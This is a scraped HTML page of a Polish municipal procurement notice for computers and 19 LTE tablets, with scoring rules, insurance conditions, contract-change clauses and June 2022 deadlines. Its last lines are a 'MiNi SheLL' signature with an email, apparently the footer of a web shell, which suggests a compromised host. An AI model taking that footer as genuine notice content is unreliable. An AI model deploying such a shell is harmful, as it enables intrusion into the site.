gniazdo audio<br/>Zasilanie	Oryginalny zasilacz producenta komputera. Dopuszczalny jest zasilacz zewnętrzny.<br/>Akcesoria	Klawiatura <br/>Mysz <br/>EFI / BIOS	•	Możliwość, bez uruchamiania systemu operacyjnego komputera lub innych podłączonych do niego urządzeń zewnętrznych odczytania z BIOS informacji o: wersji BIOS, nr seryjnym komputera,<br/>•	Funkcja blokowania wejścia do BIOS oraz blokowania startu systemu operacyjnego,<br/>•	możliwość włączenia/wyłączenia sprzętowego wsparcia wirtualizacji dla poszczególnych komponentów systemu<br/>Dodatkowe	Komputer musi posiadać wbudowany wizualny lub dźwiękowy system diagnostyczny, służący do sygnalizowania i diagnozowania problemów z komputerem i jego komponentami, a w szczególności musi sygnalizować:<br/>•	uszkodzenie lub brak pamięci RAM<br/>•	uszkodzenie złączy PCI i PCIe,<br/>•	uszkodzenie płyty głównej<br/>•	uszkodzenie kontrolera Video<br/>•	uszkodzenie pamięci masowej<br/>•	awarię EFI / BIOS’u<br/>•	awarię procesora<br/>Możliwość zabezpieczenia linką (port Kensington Lock)<br/>Wbudowany moduł TPM 2.0 </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 56875,28 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">30200000-1 - Urządzenia komputerowe</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">48000000-8 - Pakiety oprogramowania i systemy informatyczne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">60 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Przy wyborze najkorzystniejszej oferty, zamawiający będzie się kierował następującymi kryteriami: <br/><br/>- CENA znaczenie – 60 %<br/><br/>- GWARANCJA znaczenie – 40 % <br/><br/>Kryterium „CENA” – ocenie zostanie poddana cena brutto oferty za realizację całości zamówienia, obliczona przez wykonawcę, podana w „FORMULARZU OFERTOWYM”. Maksymalną liczbę punktów, tj. 60 pkt otrzyma wykonawca, który zaproponuje najniższą cenę brutto (cena ofertowa brutto musi uwzględniać wszelkie koszty jakie Wykonawca poniesie w związku z realizacją przedmiotu zamówienia) pozostali natomiast proporcjonalnie mniej. <br/>Oceny pozostałych ofert zostaną przeliczone według następującego wzoru: <br/><br/><br/> Cena brutto najniższej zaproponowanej oferty<br/><br/> Ocena = ---------------------------------------------------------------------- x 60<br/> <br/> Cena brutto oferty badanej<br/><br/><br/>Kryterium „GWARANCJA” – ocena punktowa w kryterium „GWARANCJA” dokonana zostanie zgodnie z procedurą opisaną poniżej:<br/><br/>Punkty za kryterium gwarancja zostaną przyznane Wykonawcy na podstawie oświadczenia dotyczącego okresu udzielonej gwarancji zawartego w formularzu oferty. Punkty za kryterium „Gwarancja&#34; zostaną obliczone w następujący sposób: <br/><br/>Gwarancja minimum 12 miesięcy – 0 pkt <br/>Gwarancja 24 miesięcy – 20 pkt <br/>Gwarancja 36 miesięcy – 40 pkt <br/><br/>Przy ocenie ofert będzie brany pod uwagę okres udzielonej gwarancji (w miesiącach). Maksymalny okres gwarancji podlegający punktacji to 36 miesięcy. Oznacza to, że Wykonawca, który zaproponuje okres gwarancji dłuższy niż 36 miesięcy nie otrzyma więcej niż 40 punktów. <br/>Jeśli Wykonawca nie poda w formularzu ofertowym okresu gwarancji zgodnie z wymogami (zostanie zaoferowany przez Wykonawcę okres gwarancji poniżej 12 miesięcy lub nie zostanie wpisany okres gwarancji), złożona przez niego oferta w kryterium „GWARANCJA” otrzyma 0 pkt.<br/><br/>Długość okresu gwarancji ma zostać wskazana skokowo, zgodnie z poziomami wskazanymi powyżej. W przypadku wskazania okresu gwarancji spoza wskazanych wyróżnionych okresów, Zamawiający przyzna punktację zgodną z najbliższym, niższym poziomem punktacji określonej powyżej.<br/><br/>2.	Liczby punktów w poszczególnych kryteriach („CENA”, „GWARANCJA”) zostaną zsumowane. Oferta, która uzyska największą liczbę punktów w poszczególnych kryteriach będzie ofertą najkorzystniejszą. Punktacja będzie liczona z dokładnością do dwóch miejsc po przecinku. <br/>3.	Zamawiający udzieli zamówienia Wykonawcy, którego oferta odpowiada zasadom określonym w ustawie Prawo zamówień publicznych oraz wszystkim wymaganiom określonym w swz i który uzyskał najwyższą liczbę punktów w wyżej wymienionych kryteriach.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">GWARANCJA</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> CZĘŚĆ NR 3:<br/>DOSTAWA TABLETÓW W LICZBIE 19 SZTUK OBEJMUJĄCA: tablety z oprogramowaniem fabrycznym -System operacyjny zgodnie z opisem w załączniku nr 1,2 i 3 ( PUNKT V SWZ -OPIS PRZEDMIOTU ZAMÓWIENIA)<br/><br/>TABLET – 19 SZT.<br/><br/><br/>Nazwa komponentu	<br/>Wymagane minimalne parametry techniczne tabletu<br/><br/>Przekątna ekranu	Minimum 10.0” <br/>Rozdzielczość ekranu	Minimum 1920x1080<br/>Typ ekranu	Dotykowy<br/>Pamięć RAM	Minimum 4 GB<br/>Pamięć wbudowana	Minimum 64 GB<br/>Aparat	Rozdzielczość kamery tylnej minimum 8MP<br/>Rozdzielczość kamery przedniej minimum 5MP<br/>Komunikacja	Standard WIFI minimum: IEEE 802.11 b/g/n oraz Bluetooth <br/>Modem WWAN (3G) / LTE (4G) / 5G	Wbudowany<br/>Funkcja telefonu komórkowego Tak <br/>	Tak<br/>Karta SIM	Nano<br/>Bateria	Pojemność minimum 5000 mAh<br/>System operacyjny	Zainstalowany system operacyjny minimum Android 10.0 lub równoważny w zakresie minimum: <br/>-	system operacyjny musi zapewnić wielozadaniowość, wielowątkowość, pamięć wirtualną i możliwość zarządzania pamięcią<br/>-	musi mieć możliwość uruchomienia dwóch aplikacji obok siebie na jednym ekranie<br/>-	musi posiadać możliwość wykorzystania trybu uśpienie w ruchu – zużywanie mniej energii<br/>-	musi posiadać możliwość spersonalizowania ustawień urządzenia według preferencji użytkownika<br/>-	musi posiadać możliwość zmiany kolejności kafelków Szybkich ustawień<br/>-	musi posiadać możliwość bezpośredniej odpowiedzi na powiadomienie<br/>-	musi posiadać możliwość grupowania powiadomień <br/>-	musi posiadać możliwość indywidualnego ustawienia ograniczenia ilości danych zużywanych przez urządzenie <br/>-	musi posiadać możliwość personalizacji rozmiaru wyświetlacza <br/>-	musi posiadać pobieranie aktualizacji w tle bez konieczności wyłączania urządzenia <br/>-	musi posiadać możliwość zapisywania danych w chmurze. <br/>Porty komunikacyjne	Minimum: <br/>1 x USB Type C, 1 x 3,5mm minijack 1 x Czytnik kart minimum microSD<br/>Wyposażenie	Zasilacz </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 15513,60 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">30200000-1 - Urządzenia komputerowe</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">48000000-8 - Pakiety oprogramowania i systemy informatyczne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">60 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Przy wyborze najkorzystniejszej oferty, zamawiający będzie się kierował następującymi kryteriami: <br/><br/>- CENA znaczenie – 60 %<br/><br/>- GWARANCJA znaczenie – 40 % <br/><br/>Kryterium „CENA” – ocenie zostanie poddana cena brutto oferty za realizację całości zamówienia, obliczona przez wykonawcę, podana w „FORMULARZU OFERTOWYM”. Maksymalną liczbę punktów, tj. 60 pkt otrzyma wykonawca, który zaproponuje najniższą cenę brutto (cena ofertowa brutto musi uwzględniać wszelkie koszty jakie Wykonawca poniesie w związku z realizacją przedmiotu zamówienia) pozostali natomiast proporcjonalnie mniej. <br/>Oceny pozostałych ofert zostaną przeliczone według następującego wzoru: <br/><br/><br/> Cena brutto najniższej zaproponowanej oferty<br/><br/> Ocena = ---------------------------------------------------------------------- x 60<br/> <br/> Cena brutto oferty badanej<br/><br/><br/>Kryterium „GWARANCJA” – ocena punktowa w kryterium „GWARANCJA” dokonana zostanie zgodnie z procedurą opisaną poniżej:<br/><br/>Punkty za kryterium gwarancja zostaną przyznane Wykonawcy na podstawie oświadczenia dotyczącego okresu udzielonej gwarancji zawartego w formularzu oferty. Punkty za kryterium „Gwarancja&#34; zostaną obliczone w następujący sposób: <br/><br/>Gwarancja minimum 12 miesięcy – 0 pkt <br/>Gwarancja 24 miesięcy – 20 pkt <br/>Gwarancja 36 miesięcy – 40 pkt <br/><br/>Przy ocenie ofert będzie brany pod uwagę okres udzielonej gwarancji (w miesiącach). Maksymalny okres gwarancji podlegający punktacji to 36 miesięcy. Oznacza to, że Wykonawca, który zaproponuje okres gwarancji dłuższy niż 36 miesięcy nie otrzyma więcej niż 40 punktów. <br/>Jeśli Wykonawca nie poda w formularzu ofertowym okresu gwarancji zgodnie z wymogami (zostanie zaoferowany przez Wykonawcę okres gwarancji poniżej 12 miesięcy lub nie zostanie wpisany okres gwarancji), złożona przez niego oferta w kryterium „GWARANCJA” otrzyma 0 pkt.<br/><br/>Długość okresu gwarancji ma zostać wskazana skokowo, zgodnie z poziomami wskazanymi powyżej. W przypadku wskazania okresu gwarancji spoza wskazanych wyróżnionych okresów, Zamawiający przyzna punktację zgodną z najbliższym, niższym poziomem punktacji określonej powyżej.<br/><br/>2.	Liczby punktów w poszczególnych kryteriach („CENA”, „GWARANCJA”) zostaną zsumowane. Oferta, która uzyska największą liczbę punktów w poszczególnych kryteriach będzie ofertą najkorzystniejszą. Punktacja będzie liczona z dokładnością do dwóch miejsc po przecinku. <br/>3.	Zamawiający udzieli zamówienia Wykonawcy, którego oferta odpowiada zasadom określonym w ustawie Prawo zamówień publicznych oraz wszystkim wymaganiom określonym w swz i który uzyskał najwyższą liczbę punktów w wyżej wymienionych kryteriach.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">GWARANCJA</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy (art. 57 Pzp) nie podlegają wykluczeniu na zasadach określonych w niniejszej SWZ, oraz spełniają określone przez Zamawiającego warunki udziału w postępowaniu.<br/>2.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki udziału (art. 112 Pzp) dotyczące:<br/>1)	zdolności do występowania w obrocie gospodarczym:<br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/>2)	uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów:<br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/>3)	sytuacji ekonomicznej lub finansowej:<br/>O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy są ubezpieczeni od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia z sumą gwarancyjną tego ubezpieczenia w wysokości<br/>680 000,00 zł, w przypadku, gdy Wykonawca składa ofertę na CZĘŚĆ NR 1, CZĘŚĆ NR 2 , CZĘŚĆ NR 3.<br/>W przypadku, gdy Wykonawca składa ofertę na CZĘŚĆ NR 1 zobligowany jest do wykazania, iż jest ubezpieczony od odpowiedzialności cywilnej na kwotę 600 000,00 zł w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.<br/>W przypadku, gdy Wykonawca składa ofertę na CZĘŚĆ NR 2 zobligowany jest do wykazania, iż jest ubezpieczony od odpowiedzialności cywilnej na kwotę 61 000,00 zł w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.<br/>W przypadku, gdy Wykonawca składa ofertę na CZĘŚĆ NR 3 zobligowany jest do wykazania, iż jest ubezpieczony od odpowiedzialności cywilnej na kwotę 19 000,00 zł w zakresie prowadzonej działalności związanej z przedmiotem zamówienia. <br/><br/>4)	zdolności technicznej lub zawodowej:<br/>Zamawiający nie stawia warunku w powyższym zakresie. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Podmiotowe środki dowodowe wymagane od wykonawcy obejmują:<br/>W zakresie wykazania spełnienia przez Wykonawcę warunków udziału w postępowaniu dotyczących sytuacji ekonomicznej lub finansowej należy przedłożyć, na wezwanie Zamawiającego, dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia ze wskazaniem sumy gwarancyjnej tego ubezpieczenia (UWAGA: W SYTUACJI, GDY FAKT OPŁACENIA POLISY NIE WYNIKA Z SAMEJ TREŚCI POLISY NALEŻY DOŁĄCZYĆ INNY DOKUMENT POTWIERDZAJĄCY OPŁACENIE POLISY) jako załącznik nr 4 – (nie należy dołączać do oferty – składa Wykonawca, którego oferta zostanie najwyżej oceniona).</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający nie wymaga złożenia przedmiotowych środków dowodowych <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1) Formularz ofertowy, zgodnie z załącznikiem nr 1 do SWZ,<br/>2) Oświadczenie o spełnianiu warunków udziału w postępowaniu - zgodnie z załącznikiem nr 2<br/>do SWZ – w przypadku wspólnego ubiegania się o zamówienie przez<br/>Wykonawców, oświadczenie składane jest przez Wykonawcę wykazującego spełnienie warunku,<br/>3) Oświadczenie o niepodleganiu wykluczeniu z postępowania, zgodnie z załącznikiem nr 3 do<br/>SWZ – w przypadku wspólnego ubiegania się o zamówienie<br/>przez Wykonawców, oświadczenie o niepodleganiu wykluczenia składa każdy z Wykonawców,<br/>4) Pełnomocnictwo upoważniające do złożenia oferty, o ile ofertę składa pełnomocnik,<br/>5) Pełnomocnictwo do reprezentowania w postępowaniu Wykonawców wspólnie ubiegających<br/>się o udzielenie zamówienie – dotyczy ofert składanych przez Wykonawców wspólnie<br/>ubiegających się o udzielenie zamówienia (nie dotyczy spółki cywilnej, o ile<br/>upoważnienie/pełnomocnictwo do występowania w imieniu tej spółki wynika z dołączonej do<br/>oferty umowy spółki bądź wszyscy wspólnicy podpiszą ofertę).<br/>6) Oświadczenie Wykonawców wspólnie ubiegających się o udzielenie zamówienia określające,<br/>które roboty wykonują poszczególni Wykonawcy - według wzoru stanowiącego załącznik nr 5 do<br/>SWZ – w przypadku wspólnego ubiegania się o zamówienie przez Wykonawców,<br/>7) Zobowiązanie podmiotu udostępniającego zasoby według wzoru stanowiącego załącznik nr 6<br/>do SWZ - jeżeli Wykonawca w celu potwierdzenia spełnienia warunków udziału polega na<br/>zdolnościach lub sytuacji podmiotów udostępniających zasoby wraz z zobowiązaniem składa<br/>oświadczenie o niepodleganiu wykluczeniu z postępowaniu tego podmiotu oraz oświadczenie o<br/>spełnianiu warunków udziału w postępowaniu w zakresie w jakim Wykonawca powołuje się na<br/>jego zasoby, <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia (art. 58 ust. 1 Pzp).<br/>2. Podmioty występujące wspólnie ponoszą solidarną odpowiedzialność za niewykonanie lub<br/>nienależyte wykonanie zamówienia.<br/>3. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia, ustanawiają pełnomocnika do<br/>reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w<br/>postępowaniu i zawarcia umowy w sprawie zamówienia publicznego – nie dotyczy spółki<br/>cywilnej, o ile upoważnienie/pełnomocnictwo do występowania w imieniu tej spółki wynika z dołączonej do oferty umowy spółki bądź wszyscy wspólnicy podpiszą ofertę.<br/>4. Przepisy Prawa zamówień publicznych dotyczące Wykonawcy stosuje się odpowiednio do<br/>Wykonawców wspólnie ubiegających się o zamówienia.<br/>5. Warunek dotyczący uprawnień do prowadzenia określonej działalności gospodarczej lub<br/>zawodowej, o którym mowa w art. 112 ust. 2 pkt 2 ustawy Pzp, jest spełniony, jeżeli co najmniej<br/>jeden z Wykonawców wspólnie ubiegających się o udzielenie zamówienia posiada uprawnienia<br/>do prowadzenia określonej działalności gospodarczej lub zawodowej i zrealizuje roboty<br/>budowlane, dostawy lub usługi, do których realizacji te uprawnienia są wymagane (art. 117 ust.<br/>2 Pzp).<br/>W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub<br/>doświadczenia Wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na<br/>zdolnościach tych z Wykonawców, którzy wykonają roboty budowlane lub usługi, do realizacji<br/>których te zdolności są wymagane (art. 117 ust. 3 Pzp).<br/>W przypadku, o którym mowa w niniejszym punkcie, Wykonawcy wspólnie ubiegający się o<br/>udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które roboty<br/>budowlane, dostawy lub usługi wykonają poszczególni Wykonawcy, zgodnie z załącznikiem nr 4<br/>do SWZ (art. 117 ust. 4 Pzp).<br/>W odniesieniu do warunków określonych w rozdziale XVI SWZ, wymagania te muszą być<br/>spełnione wspólnie przez Wykonawców składających ofertę w postępowaniu (nie musi ich<br/>spełniać osobno każdy z Wykonawców składających ofertę wspólną). Na ich potwierdzenie<br/>należy złożyć dokumenty określone w rozdziale XVII SWZ.<br/>Każdy z Wykonawców występujących wspólnie zobowiązany jest do wykazania braku podstaw<br/>do wykluczenia z postępowania o udzielenie zamówienia publicznego. W takim przypadku<br/>oświadczenia i/lub dokumenty wymienione w rozdziale XVII SWZ składa każdy z Wykonawców<br/>występujących wspólnie. Dokumenty te potwierdzają spełnianie warunków udziału w<br/>postępowaniu oraz brak podstaw wykluczenia w zakresie, w którym każdy z Wykonawców<br/>wykazuje spełnianie warunków udziału w postępowaniu oraz brak podstaw wykluczenia (art.125<br/>ust. 4 Pzp). <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.	Kierując się zapisami art. 455 ust. 1 pkt 1 ustawy Prawo zamówień publicznych, Zamawiający dopuszcza dokonanie zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy w następujących przypadkach: <br/>a)	zmiany rozwiązań ze względu na postęp techniczny lub technologiczny (np. wycofanie z obrotu urządzeń lub podzespołów), zmiana nie może spowodować podwyższenia ceny oraz obniżenia parametrów technicznych, jakościowych i innych wynikających z oferty (opisu przedmiotu zamówienia / opisu oferowanego towaru), na podstawie której był dokonany wybór Wykonawcy,<br/>b)	gdy nastąpi zmiana powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację umowy, w tym: zmiana stawki podatku od towarów i usług na asortyment stanowiący przedmiot umowy oraz podatku akcyzowego – w takim przypadku obniżenie lub podwyższenie wynagrodzenia jest możliwe w wysokości odpowiadającej zmianie podatku od towarów i usług oraz podatku akcyzowego, <br/>c)	zmiany terminu realizacji zamówienia z powodu działania siły wyższej, za które uważa się zdarzenia w charakterze nadzwyczajnym, występujące po zawarciu umowy, a których Strony nie były w stanie przewidzieć w momencie jej zawarcia i których zaistnienie lub skutki uniemożliwiają wykonanie przedmiotu umowy w terminie, w szczególności wojna, nasilenia zjawisk związanych z pandemią COVID-19 lub pojawienie się nowego zdarzenia o charakterze pandemii lub epidemii; przy czym ewentualne przedłużenie terminu realizacji zamówienia nastąpi o liczbę dni, odpowiadającą okresowi występowania siły wyższej - podstawą dokonania zmian, o których mowa wyżej będzie wystąpienie opisanych okoliczności uzasadniających wstrzymanie dostaw, z określeniem okresu wpływającego na zmianę terminu i sporządzenie protokołu konieczności – zatwierdzonego przez Zamawiającego.<br/>2. Wykonawca wnioskujący o zmianę umowy, przedkłada Zamawiającemu pisemne uzasadnienie konieczności wprowadzenia zmian do umowy wraz z niezbędnymi dowodami.<br/>3. Wszelkie zmiany i uzupełnienia treści niniejszej umowy wymagają aneksu sporządzonego z zachowaniem formy pisemnej pod rygorem nieważności. <br/>4. Zmiany mogą być dokonane tylko, jeżeli jest to niezbędne dla prawidłowego wykonania przedmiotu umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-06-20 08:30</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Oferty należy złożyć za pośrednictwem Platformy Zakupowej https://platformazakupowa.pl/pn/krobia</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-06-20 09:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-07-19</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com